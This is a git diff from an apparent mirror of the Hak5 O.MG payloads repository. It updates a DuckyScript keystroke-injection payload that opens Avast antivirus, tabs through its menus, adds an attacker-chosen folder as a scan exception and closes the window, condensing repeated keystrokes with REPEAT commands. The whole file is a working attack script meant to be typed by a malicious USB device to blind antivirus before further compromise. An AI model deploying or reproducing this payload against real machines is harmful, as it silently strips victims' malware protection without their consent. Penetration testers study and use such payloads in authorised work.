mirror of https://github.com/hak5/omg-payloads.git
Update payload.txt
parent
2a0abc653a
commit
120dd165a5
|
@ -16,79 +16,35 @@ REM - Avast installed and configured
|
||||||
REM Set the full-path that you want to set as exception
|
REM Set the full-path that you want to set as exception
|
||||||
DEFINE FULL-PATH example/to/path
|
DEFINE FULL-PATH example/to/path
|
||||||
|
|
||||||
|
DEFAULT_DELAY 500
|
||||||
REM Open Avast application
|
REM Open Avast application
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
GUI
|
GUI
|
||||||
DELAY 1000
|
STRINGLN avast
|
||||||
STRING avast
|
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM Go to Avast menu
|
REM Go to Avast menu
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
TAB
|
REPEAT 3 TAB
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
ENTER
|
||||||
|
|
||||||
REM Go to Avast settings
|
REM Go to Avast settings
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
TAB
|
REPEAT 4 TAB
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
ENTER
|
||||||
|
|
||||||
REM Go to Exceptions menu
|
REM Go to Exceptions menu
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
TAB
|
REPEAT 12 TAB
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
ENTER
|
||||||
|
|
||||||
REM Add Exception button
|
REM Add Exception button
|
||||||
DELAY 500
|
|
||||||
TAB
|
TAB
|
||||||
DELAY 500
|
|
||||||
ENTER
|
ENTER
|
||||||
|
|
||||||
REM Write the full-path and then close the Avast app
|
REM Write the full-path and then close the Avast app
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
TAB
|
TAB
|
||||||
DELAY 500
|
|
||||||
STRING FULL-PATH
|
STRING FULL-PATH
|
||||||
DELAY 500
|
|
||||||
TAB
|
TAB
|
||||||
DELAY 500
|
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 1000
|
|
||||||
ALT F4
|
ALT F4
|
||||||
|
|
Loading…
Reference in New Issue